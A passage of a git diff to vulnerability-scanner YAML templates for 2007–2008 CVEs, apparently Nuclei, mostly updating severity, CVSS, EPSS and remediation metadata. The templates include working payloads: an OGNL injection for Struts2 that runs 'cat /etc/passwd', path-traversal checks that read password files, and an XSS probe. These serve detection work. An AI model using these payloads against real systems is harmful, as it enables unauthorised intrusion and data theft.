a patched version of Jira Rainbow.Zen to mitigate the Cross-Site Scripting vulnerability. reference: - - http://web.archive.org/web/20201208220614/https://www.securityfocus.com/archive/1/459590/100/0/threaded - - https://web.archive.org/web/20210119080228/http://www.securityfocus.com/bid/22503 - https://exchange.xforce.ibmcloud.com/vulnerabilities/32418 - https://nvd.nist.gov/vuln/detail/CVE-2007-0885 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2007-0885 cwe-id: NVD-CWE-Other - cvss-score: 6.8 - tags: cve,cve2007,jira,xss + epss-score: 0.0059 + epss-percentile: 0.75862 + cpe: cpe:2.3:a:rainbow_portal:rainbow.zen:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: rainbow_portal + product: rainbow.zen + tags: cve,cve2007,jira,xss http: - method: GET @@ -30,13 +35,13 @@ http: words: - '">' - - type: status - status: - - 200 - - type: word part: header words: - "text/html" -# Enhanced by mp on 2022/08/12 + - type: status + status: + - 200 + +# digest: 490a00463044022034d32ff34d635d2ae1fede90ea931ddffe60bd0085bd8fbebf587808ac359f7f022079614a434dd5117c87c81df359c54de362a7f5bb34e1faa59122faa2c3033ba3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-4504.yaml b/http/cves/2007/CVE-2007-4504.yaml index f7f79ac589..3301236fea 100644 --- a/http/cves/2007/CVE-2007-4504.yaml +++ b/http/cves/2007/CVE-2007-4504.yaml @@ -3,20 +3,27 @@ id: CVE-2007-4504 info: name: Joomla! RSfiles <=1.0.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! RSfiles 1.0.2 and earlier is susceptible to local file inclusion in index.php in the RSfiles component (com_rsfiles). This could allow remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action. + remediation: | + Upgrade to the latest version of Joomla! RSfiles or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/4307 - https://exchange.xforce.ibmcloud.com/vulnerabilities/36222 - https://nvd.nist.gov/vuln/detail/CVE-2007-4504 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2007-4504 cwe-id: CWE-22 - tags: lfi,edb,cve,cve2007,joomla + epss-score: 0.01677 + epss-percentile: 0.8628 + cpe: cpe:2.3:a:joomla:rsfiles:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: rsfiles + tags: lfi,edb,cve,cve2007,joomla http: - method: GET @@ -25,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -34,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 490a00463044022001551ce04ad4c3929f7819b06c726a8cdd159380aaec227cab2829af15719b790220103cb2a1b40db1b3ea6be28a2bf432780b6b32bcbca5aaf3b8195c7f0f0c272f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-4556.yaml b/http/cves/2007/CVE-2007-4556.yaml index 4714c774ea..82dc461080 100644 --- a/http/cves/2007/CVE-2007-4556.yaml +++ b/http/cves/2007/CVE-2007-4556.yaml @@ -3,42 +3,51 @@ id: CVE-2007-4556 info: name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution author: pikpikcu - severity: critical + severity: medium description: | Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character. + remediation: | + Update to the latest version of Apache Struts2 reference: - https://www.guildhab.top/?p=2326 - https://nvd.nist.gov/vuln/detail/CVE-2007-4556 - https://cwiki.apache.org/confluence/display/WW/S2-001 - http://forums.opensymphony.com/ann.jspa?annID=54 + - http://issues.apache.org/struts/browse/WW-2030 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2007-4556 cwe-id: NVD-CWE-Other - tags: cve,cve2007,apache,rce,struts + epss-score: 0.19583 + epss-percentile: 0.95727 + cpe: cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: opensymphony + product: xwork + tags: cve,cve2007,apache,rce,struts http: - method: POST path: - "{{BaseURL}}/login.action" - headers: - Content-Type: application/x-www-form-urlencoded + body: | username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - - type: regex + part: body regex: - "root:.*:0:0:" - part: body - type: status status: - 200 -# Enhanced by mp on 2022/05/10 +# digest: 4a0a004730450221008a3dd525d9fa55739abc14a857faa6d2e899eded5824ccbaabaef848de556a9402203e28896380a2e880b820bacc6d3086191f109a8e187dec708ce3f26c31dec638:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2007/CVE-2007-5728.yaml b/http/cves/2007/CVE-2007-5728.yaml index 73ed469f7a..361040a53b 100644 --- a/http/cves/2007/CVE-2007-5728.yaml +++ b/http/cves/2007/CVE-2007-5728.yaml @@ -5,41 +5,50 @@ info: author: dhiyaneshDK severity: medium description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865. + remediation: | + Upgrade to a patched version of phpPgAdmin or apply the necessary security patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/30090 - http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html - - http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/ - - http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/ - https://nvd.nist.gov/vuln/detail/CVE-2007-5728 + - http://www.debian.org/security/2008/dsa-1693 + - http://www.novell.com/linux/security/advisories/2007_24_sr.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2007-5728 cwe-id: CWE-79 + epss-score: 0.02361 + epss-percentile: 0.8861 + cpe: cpe:2.3:a:phppgadmin:phppgadmin:3.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phppgadmin + product: phppgadmin shodan-query: http.title:"phpPgAdmin" tags: cve,cve2007,xss,pgadmin,phppgadmin,edb http: - method: GET path: - - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test' + - '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test' matchers-condition: and matchers: - - type: word words: - - '' - - - type: status - status: - - 200 + - '' + - 'phpPgAdmin' + condition: and + case-insensitive: true - type: word part: header words: - "text/html" -# Enhanced by mp on 2022/08/12 + - type: status + status: + - 200 + +# digest: 490a0046304402203f16f02910aac9d647b6e752654542d0911b46d7967e942ae37ce91e0f1cadd702201e513efe5e17faac859cf4b2d3e141d3a3fbfe1a42588a05cc56732fb6aa0489:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-1059.yaml b/http/cves/2008/CVE-2008-1059.yaml index 0d156411a7..0bfecc41dc 100644 --- a/http/cves/2008/CVE-2008-1059.yaml +++ b/http/cves/2008/CVE-2008-1059.yaml @@ -6,19 +6,27 @@ info: severity: high description: | PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter. + remediation: | + Update WordPress Sniplets to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/5194 - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1059 - - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/ + - http://securityreason.com/securityalert/3706 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/40829 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2008-1059 - cwe-id: CWE-79 - tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan + cwe-id: CWE-94 + epss-score: 0.01493 + epss-percentile: 0.85411 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wordpress + product: sniplets_plugin + tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan http: - method: GET @@ -38,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/29 +# digest: 4a0a00473045022100c3eedd62461e37dda67348524ff81399bb484916f25ddff0cd95a868f129545a022049a10ec6c835d8516453a367102b665554f24aa6c1906d3cb54a3653d1438ea9:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-1061.yaml b/http/cves/2008/CVE-2008-1061.yaml index 8a2cb62b01..5df3a8852d 100644 --- a/http/cves/2008/CVE-2008-1061.yaml +++ b/http/cves/2008/CVE-2008-1061.yaml @@ -3,22 +3,30 @@ id: CVE-2008-1061 info: name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting author: dhiyaneshDK - severity: high + severity: medium description: | WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php. + remediation: | + Update WordPress Sniplets plugin to the latest version available, which addresses the XSS vulnerability. reference: - https://www.exploit-db.com/exploits/5194 - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881 - https://nvd.nist.gov/vuln/detail/CVE-2008-1061 - http://securityreason.com/securityalert/3706 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/40830 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-1061 cwe-id: CWE-79 - tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets + epss-score: 0.00938 + epss-percentile: 0.81334 + cpe: cpe:2.3:a:wordpress:sniplets_plugin:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wordpress + product: sniplets_plugin + tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets http: - method: GET @@ -41,5 +49,4 @@ http: status: - 200 - -# Enhanced by mp on 2022/08/31 +# digest: 4a0a004730450220194b938eb7bcff1b3cd6f6d2666e8a9f549019a04f93b48f364604c13634a5d80221009b2d3c3ecc6d2ffe3c88c4c0bb7e362764aeefc9554e3eded01c7d144d59a773:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-1547.yaml b/http/cves/2008/CVE-2008-1547.yaml index bc9e0ebac4..29e0f3fc7c 100644 --- a/http/cves/2008/CVE-2008-1547.yaml +++ b/http/cves/2008/CVE-2008-1547.yaml @@ -6,18 +6,25 @@ info: severity: medium description: | Open redirect vulnerability in exchweb/bin/redir.asp in Microsoft Outlook Web Access (OWA) for Exchange Server 2003 SP2 (aka build 6.5.7638) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the URL parameter. + remediation: | + Apply the necessary security patches or upgrade to a newer version of Microsoft Exchange Server. reference: - https://nvd.nist.gov/vuln/detail/CVE-2008-1547 - https://www.exploit-db.com/exploits/32489 - - https://www.securityfocus.com/bid/31765/info + - http://securityreason.com/securityalert/4441 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46061 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2008-1547 cwe-id: CWE-601 + epss-score: 0.03523 + epss-percentile: 0.90504 cpe: cpe:2.3:a:microsoft:exchange_server:2003:sp2:*:*:*:*:*:* metadata: max-request: 2 + vendor: microsoft + product: exchange_server shodan-query: http.title:"Outlook" tags: cve,cve2008,redirect,owa,exchange,microsoft @@ -33,3 +40,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# digest: 4a0a0047304502203e1aeb5fba3adaa3b5830402641b813cf8f94bc2a94add09db1c2115fa494198022100c4c252be8af5df45e2c51c2ac050d25d5070de8f17a57e7bdee4817e74bf0222:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-2398.yaml b/http/cves/2008/CVE-2008-2398.yaml index eb9da66463..f30513b3e1 100644 --- a/http/cves/2008/CVE-2008-2398.yaml +++ b/http/cves/2008/CVE-2008-2398.yaml @@ -5,20 +5,25 @@ info: author: unstabl3 severity: medium description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter. + remediation: | + Upgrade to a patched version of AppServ Open Project (>=2.5.11) or apply the necessary security patches provided by the vendor. reference: - https://exchange.xforce.ibmcloud.com/vulnerabilities/42546 - - http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/ - - http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/ - http://securityreason.com/securityalert/3896 - https://nvd.nist.gov/vuln/detail/CVE-2008-2398 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-2398 cwe-id: CWE-79 - cvss-score: 4.3 - tags: cve,cve2008,xss + epss-score: 0.00329 + epss-percentile: 0.67729 + cpe: cpe:2.3:a:appserv_open_project:appserv:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: appserv_open_project + product: appserv + tags: cve,cve2008,xss http: - method: GET @@ -27,17 +32,18 @@ http: matchers-condition: and matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - "" - part: body - - type: word - words: - - "text/html" - part: header - -# Enhanced by mp on 2022/08/12 +# digest: 490a0046304402202eece447667efcf723ec736194d4e6131158824c0b4fe04d2154e22c484f2e7902206b9dcc982ee53cffbf6dd6674aad5ddb16684cee8c98663b9a377cdcac2b9f4a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-2650.yaml b/http/cves/2008/CVE-2008-2650.yaml index e290327809..5340b6c06a 100644 --- a/http/cves/2008/CVE-2008-2650.yaml +++ b/http/cves/2008/CVE-2008-2650.yaml @@ -3,22 +3,30 @@ id: CVE-2008-2650 info: name: CMSimple 3.1 - Local File Inclusion author: pussycat0x - severity: high + severity: medium description: | CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number. + remediation: | + Upgrade CMSimple to a patched version or apply the necessary security patches provided by the vendor. reference: - http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17 - - http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/ - http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463 - https://nvd.nist.gov/vuln/detail/CVE-2008-2650 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42792 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/42793 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2008-2650 cwe-id: CWE-22 - tags: cve,cve2008,lfi,cmsimple + epss-score: 0.06344 + epss-percentile: 0.92841 + cpe: cpe:2.3:a:cmsimple:cmsimple:3.1:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cmsimple + product: cmsimple + tags: cve,cve2008,lfi,cmsimple http: - raw: @@ -29,7 +37,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: @@ -39,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a0047304502200db7d6b8a0b2dd910c204b6d0fc0edfd9abc9da3b8e167e448c86febf5b6cad8022100dc7353b101404775789a15b8614ce1a10969e2ec55b2498d01858111adfd0f74:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-4668.yaml b/http/cves/2008/CVE-2008-4668.yaml index b4217fd09d..dbd4b16a62 100644 --- a/http/cves/2008/CVE-2008-4668.yaml +++ b/http/cves/2008/CVE-2008-4668.yaml @@ -3,21 +3,28 @@ id: CVE-2008-4668 info: name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion author: daffainfo - severity: high + severity: critical description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. + remediation: | + Upgrade to a patched version of Joomla! Image Browser or apply the necessary security patches to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/6618 - - http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/ - http://securityreason.com/securityalert/4464 - https://nvd.nist.gov/vuln/detail/CVE-2008-4668 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/45490 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:P cvss-score: 9 cve-id: CVE-2008-4668 cwe-id: CWE-22 - tags: cve,cve2008,joomla,lfi,edb + epss-score: 0.01018 + epss-percentile: 0.82111 + cpe: cpe:2.3:a:joomla:com_imagebrowser:0.1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: com_imagebrowser + tags: cve,cve2008,joomla,lfi,edb http: - method: GET @@ -26,7 +33,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a00473045022100ca7efc528df16baf994cca6fb364720a27eccd111b821a0a9b9bdb3a5e879ed0022059319cfb6e5eb2a3c61533aeeb96e043f0c4cd4a5f6b7c99859162257720e11c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-4764.yaml b/http/cves/2008/CVE-2008-4764.yaml index 0249845b8c..9ac0f8e1cb 100644 --- a/http/cves/2008/CVE-2008-4764.yaml +++ b/http/cves/2008/CVE-2008-4764.yaml @@ -3,21 +3,27 @@ id: CVE-2008-4764 info: name: Joomla! <=2.0.0 RC2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. + remediation: | + Upgrade Joomla! to a version higher than 2.0.0 RC2 to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/5435 - - http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/41873 - https://nvd.nist.gov/vuln/detail/CVE-2008-4764 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-4764 cwe-id: CWE-22 - tags: edb,cve,cve2008,joomla,lfi + epss-score: 0.02365 + epss-percentile: 0.88618 + cpe: cpe:2.3:a:extplorer:com_extplorer:*:rc2:*:*:*:*:*:* metadata: max-request: 1 + vendor: extplorer + product: com_extplorer + tags: edb,cve,cve2008,joomla,lfi http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4b0a004830460221009428c9c999e5d8cec504cb786e97bec88820fc37f747d83b1bcd65570cde6709022100cd1f584c57f77d3c27ef251341f014126de8451ca3615c65a9d501a1c227fe43:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-5587.yaml b/http/cves/2008/CVE-2008-5587.yaml index 3c37314536..bb8da55bce 100644 --- a/http/cves/2008/CVE-2008-5587.yaml +++ b/http/cves/2008/CVE-2008-5587.yaml @@ -5,19 +5,26 @@ info: author: dhiyaneshDK severity: medium description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php. + remediation: | + Upgrade phpPgAdmin to a version higher than 4.2.1 or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/7363 - - http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/ - - http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014 - - http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263 - https://nvd.nist.gov/vuln/detail/CVE-2008-5587 + - http://lists.opensuse.org/opensuse-security-announce/2009-02/msg00002.html + - http://lists.opensuse.org/opensuse-updates/2012-04/msg00033.html + - http://securityreason.com/securityalert/4737 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N cvss-score: 4.3 cve-id: CVE-2008-5587 cwe-id: CWE-22 + epss-score: 0.02331 + epss-percentile: 0.88536 + cpe: cpe:2.3:a:phppgadmin:phppgadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phppgadmin + product: phppgadmin shodan-query: http.title:"phpPgAdmin" tags: cve,cve2008,lfi,phppgadmin,edb @@ -28,7 +35,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -37,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/22 +# digest: 4b0a00483046022100d49c7bc9e0b7b1a607aee243c51f21f4aeaddd8e891328544fda07d338b93e14022100c44e092781a629e90bc2d83dd0cd71fba546325f183e93704eb0725b76ae49fc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6080.yaml b/http/cves/2008/CVE-2008-6080.yaml index 4e1804e53f..5570538b84 100644 --- a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml @@ -3,21 +3,27 @@ id: CVE-2008-6080 info: name: Joomla! ionFiles 4.4.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + remediation: | + Update Joomla! ionFiles to the latest version or apply the provided patch to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/6809 - - http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/ - - http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/ - https://nvd.nist.gov/vuln/detail/CVE-2008-6080 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46039 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-6080 cwe-id: CWE-22 - tags: edb,cve,cve2008,joomla,lfi + epss-score: 0.00824 + epss-percentile: 0.80016 + cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: codecall + product: com_ionfiles + tags: edb,cve,cve2008,joomla,lfi http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a004730450220239dd2522ce72c86f2c2e49f76c268455d3de2eb6955b37b7571d330c83008f20221008920658789835cbff116447d16385a589bfb5734b96e3eb7a1a0c3a887d29265:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index 97a0925006..307372a616 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml @@ -3,21 +3,27 @@ id: CVE-2008-6172 info: name: Joomla! Component RWCards 3.0.11 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. + remediation: | + Update Joomla! Component RWCards to the latest version to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/6817 - https://nvd.nist.gov/vuln/detail/CVE-2008-6172 - - http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/ - - http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46081 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2008-6172 cwe-id: CWE-22 - tags: cve2008,joomla,lfi,edb,cve + epss-score: 0.00509 + epss-percentile: 0.73895 + cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: weberr + product: rwcards + tags: cve2008,joomla,lfi,edb,cve http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/03/30 +# digest: 4b0a00483046022100f455fd8ef1be7fec2757ab6190ce495aca694581ca5e2da98c387236f8f0a5ee022100aad89f0fff1bf791aac256b53a5f7771e1b68931735faea6fb30122cf1e0a5ed:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 7348db9a5d..20e757e4f9 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml @@ -3,21 +3,27 @@ id: CVE-2008-6222 info: name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. + remediation: | + Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability. reference: - https://www.exploit-db.com/exploits/6980 - - http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/ - - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/ - https://nvd.nist.gov/vuln/detail/CVE-2008-6222 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46356 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-6222 cwe-id: CWE-22 - tags: cve2008,joomla,lfi,edb,cve + epss-score: 0.01029 + epss-percentile: 0.82189 + cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlashowroom + product: pro_desk_support_center + tags: cve2008,joomla,lfi,edb,cve http: - method: GET @@ -26,7 +32,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a0047304502210083f13b26a5a5e2db9eab30ac22f036d4983f3a67cdbe1bc70fd00a4a39111c3d022040eeb62fb1b9821918ed8439f89bcce9292ee7c6644b3a9e85b28cff2460c092:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index 5d52e6f455..47416266fe 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml @@ -6,19 +6,26 @@ info: severity: medium description: | Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple 